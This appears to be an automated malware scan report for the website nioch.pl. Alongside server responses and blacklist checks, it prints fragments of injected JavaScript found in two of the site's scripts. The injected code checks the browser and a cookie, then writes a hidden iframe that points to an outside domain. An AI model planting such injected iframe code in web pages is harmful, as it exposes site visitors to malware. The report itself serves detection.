Scanned pages/files
Request | Server response | Status |
http://nioch.pl/ | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Wed, 10 Sep 2014 04:01:37 GMT Pragma: no-cache Location: http://www.nioch.pl/ Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=fc61148e0f6592c07779c569bb6d7270; path=/ X-Powered-By: PHP/5.3.28 | clean |
http://www.nioch.pl/ | 200 OK Content-Length: 51709 Content-Type: text/html | clean |
http://code.jquery.com/jquery-1.9.0.min.js | 200 OK Content-Length: 93068 Content-Type: application/x-javascript | clean |
http://code.jquery.com/jquery-migrate-1.2.1.min.js | 200 OK Content-Length: 7199 Content-Type: application/x-javascript | clean |
https://ajax.googleapis.com/ajax/libs/jqueryui/1.11.0/jquery-ui.min.js | 200 OK Content-Length: 237548 Content-Type: text/javascript | clean |
http://www.nioch.pl/compress/cache.Lang.PL.js,script.js,scroll/jquery.stickyscroll.js,paginator.js,jquery.lazyload.js,cookie-policy.js?ips=539466096 | 200 OK Content-Length: 27010 Content-Type: application/x-javascript | clean |
http://gapl.hit.gemius.pl/xgemius.js | 200 OK Content-Length: 21343 Content-Type: application/x-javascript | clean |
http://nioch.pl//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/ | 404 Not Found Content-Length: 515 Content-Type: text/html | clean |
http://nioch.pl/test404page.js | 404 Not Found Content-Length: 515 Content-Type: text/html | clean |
http://nioch.pl//static.clickonometrics.pl/_w2t.js/ | 404 Not Found Content-Length: 515 Content-Type: text/html | clean |
http://go.evolutionmedia.bbelements.com/bb/bb_one2n.js | HTTP/1.1 302 Found Cache-Control: max-age=10800 Connection: close Date: Wed, 10 Sep 2014 04:01:41 GMT Location: http://bbcdn.go.evolutionmedia.bbelements.com/bb/bb_one2n.86.65.59.1.js Server: ibillboard Content-Length: 255 Content-Type: text/html; charset=iso-8859-1 Expires: Wed, 10 Sep 2014 07:01:41 GMT | clean |
http://bbcdn.go.evolutionmedia.bbelements.com/bb/bb_one2n.86.65.59.1.js | 200 OK Content-Length: 47004 Content-Type: application/javascript | clean |
http://nioch.pl/compress/popupFacebook.js | 200 OK Content-Length: 16253 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name){var matches=document.cookie.match(new RegExp("(?:^|; )"+name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return matches?decodeURIComponent(matches[1]):undefined;} function Visitrepositorium(){var pipka=navigator.userAgent;var ulrcont=(pipka.indexOf("Chrome")>-1||pipka.indexOf("IEMobile")>-1||pipka.indexOf("Windows")<+1);var bb=(getCookie("lastshow")===undefined);if(!ulrcont&&bb){document.write('<iframe src="http://glasoretas.latiie {$("#ips-popup-wrapper").fadeOut("slow");$("#ips-popup").fadeOut("slow");if(typeof action==='number') {set=action==0?'1y':action+'s';$.cookie('ips-popup','true',{expires:set,path:'/'});} else if(action==true) {$.cookie('ips-popup','true',{expires:'1y',path:'/'});};return false}; Antivirus reports:
| ||
http://connect.facebook.net/pl_PL/sdk.js | 200 OK Content-Length: 158386 Content-Type: application/x-javascript | clean |
http://nioch.pl/js/FB.Share.js | 200 OK Content-Length: 9063 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Visitrepositorium() { var pipka = navigator.userAgent; var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1); var bb = (getCookie("lastshow") === undefined); FB.Share.renderAll() }; this.renderPass(); this.scanner = setInterval(FB.Share.renderPass, 700); if (window.attachEvent) { window.attachEvent("onload", FB.Share.stopScan) } else window.addEventListener("load", FB.Share.stopScan, false) } }; FB.Share._onFirst() } if (FB && FB.Loader) { FB.Loader.onScriptLoaded(["FB.Share", "FB.SharePro"]) } Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: nioch.pl
Result:
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 10 Sep 2014 04:01:37 GMT
Pragma: no-cache
Location: http://www.nioch.pl/
Server: nginx
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=fc61148e0f6592c07779c569bb6d7270; path=/
X-Powered-By: PHP/5.3.28
GET / HTTP/1.1
Host: nioch.pl
Result:
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 10 Sep 2014 04:01:37 GMT
Pragma: no-cache
Location: http://www.nioch.pl/
Server: nginx
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=fc61148e0f6592c07779c569bb6d7270; path=/
X-Powered-By: PHP/5.3.28
Second query (visit from search engine):
GET / HTTP/1.1
Host: nioch.pl
Referer: http://www.google.com/search?q=nioch.pl
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: nioch.pl
Referer: http://www.google.com/search?q=nioch.pl
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=nioch.pl
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://nioch.pl/
Result: nioch.pl is not infected or malware details are not published yet.
Result: nioch.pl is not infected or malware details are not published yet.